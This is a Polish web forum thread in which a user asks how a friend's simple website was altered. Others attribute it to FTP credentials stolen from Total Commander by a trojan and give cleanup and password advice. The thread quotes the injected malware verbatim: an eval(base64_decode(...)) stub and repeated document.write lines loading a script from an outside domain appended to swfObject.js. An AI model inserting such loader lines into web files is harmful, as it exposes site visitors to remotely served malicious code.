Witam,

dziwna sprawa www.transgabar.pl

strona kolegi który sobie sam ją zrobił. Dzisiaj dzwoni do mnie, że coś nie śmiga.

Przejrzałem źródła strony i

1. w pliku index był wyciety początek pliku do rozpoczęcia znacznika <head>

gdzieś na dole w stylu display: none było coś takiego

eval(base64_decode('tutaj same krzaczki'));

2. tego flasha załączył dzięki swfObject.js

na końcu tego pliku było

[HTML] pobierz, plaintext 
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
[HTML] pobierz, plaintext 

jak ktoś takie coś zrobił

jak można zmienić pliki bez włamania na konto i wyedytowania ich. Na tej stronie nie ma formularzy, bazy danych itp. Co to za atak?

a czy twoj kolega uzywa totalcommandera? Pewnie wirus wykradl hasla z niego i sie zalogowal do niego na ftp i robil co chcial. Bardzo powszechny atak ostatnio. na forum czesto omawiany

na bank używa totala. czego używać zamiast tego?
nospor dzięki. wiedziałem, że Ty od razu odpowiesz
czyli mial jakiegos wirusa na kompie? gdyby np. jakiegos tam feralnego dnia logowal sie totalem z innego kompa nie doszło by do tego?

niech zmieni hasla do ftp a nastepnie niech nie zapamietuje ich w totalu

Twórcy Totala obiecywali już jakiś czas temu, że błąd naprawią, gdyż obecnie hasła są przechowywane w sposób, który umożliwia ich prosty odczyt przez trojany, wirki czy co tam chcesz. Jak to stoi obecnie? Nie wiem czy wywiązali się z obietnicy bo już nie używam TC do ftp (Filezilla) i haseł też nigdzie nie zapamiętuję do plików ( dla bezpieczeństwa ) w programie. Zapamiętuję jedynie na czas sesji. Sam problem jest już jakoś od lutego znany bodajże albo i wcześniej (ja wtedy jakoś się z nim zetknąłem). Z tego co czytałem to dotyczył on także innych programów do łączenia z ftp, które miały niezabezpieczone pliki konfiguracyjne.
Pozostaje Ci zmienić hasła ( i nie zapamiętywać nigdzie ich ), usunąć wstawki do plików i koniecznie sprawdzić wszystkie katalogi serwera. Działa to bowiem tak, że kod jest dodawany do istniejących plików index.htm, html i czasem php. Jeśli takich nie znajdzie to tworzy na serwerze pliki index.html ze swoim kodem wewnątrz w każdym katalogu jaki przejrzy.

Może winscp (na windowsa) lub CyberDuck(na maca)? Sama się w podobny i uroczy sposób zrobiłam w TotalCmd Należę do osób częściowo leniwych więc hasła zapamiętuję, ale z brakiem np. jednej litery na końcu. Przy połączeniu wypluwa mi błąd związany z hasłem/loginem - a ja dopisuje tylko literkę na końcu .

Od dobrych kilku miesięcy w TC oprócz hasła do ftp podaje się dodatkowe hasło szyfrujące i wystarcza to na zwykłe wirusy iframe, bo wykradając hasła musiałyby poznać to dodatkowe , które jest potrzebne do połączenia. Więc jeśli nikt nie ma keyloggera to może chyba czuć się bezpiecznie?

To i ja dorzucę swoje 'pare groszy'. Przeniosłem się z TC po podobnych atakach na FileZill'e i nie zapamiętuję haseł. Od trzech miesięcy nie mam problemu z takimi akcjami 

Mimo wszystko zamiana programu to tylko obejście problemu (i to pewnie czasowe). W jakiś sposób te hasła wyciekły, czyli wirusy nadal działają.

No przecież napisałem, że wystarczy szyfrować hasła i nikt się nie zaloguje bez klucza po wykradnięciu pliku, ale skoro nadal szukacie rozwiązania to Wasza sprawa. ^^

Przede wszystkim to należy zabezpieczyć komputer antywirusem, firewallem. Co jakiś czas zrobić skanowanie systemu. Jeśli intruz się nie dostanie z zewnątrz, to sam z siebie się nie urodzi. Poza tym dobrą praktyką jest przenoszenie domyślnych konfiguracji. TC na to pozwala. To się tyczy nie tylko TC, ale innych programów, które nie szyfrują haseł.